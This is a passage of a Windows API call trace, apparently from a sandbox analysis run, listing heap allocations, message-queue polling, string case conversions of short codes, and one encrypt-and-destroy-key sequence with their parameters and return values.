RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.317] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x9f34, dwBufLen=0x9f38 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x9f38) returned 1 [0189.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0189.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0189.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0189.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0189.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0189.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0189.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0189.320] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.320] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0189.320] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.320] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.320] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.321] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.321] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.321] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.321] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.321] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.321] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.322] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.322] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.322] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.322] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0189.322] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.322] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.323] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.323] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.323] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.323] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.323] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.332] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.332] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.332] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0189.332] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.333] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0189.333] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.333] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.333] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.333] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.333] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.333] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.333] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.334] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.334] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.335] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.335] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.335] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.335] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.335] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.335] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.336] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.336] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.336] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.336] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.336] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.337] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.337] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.337] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.337] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.337] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.337] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.337] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.337] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.338] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.338] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.338] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.338] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.338] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.338] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.338] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.338] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 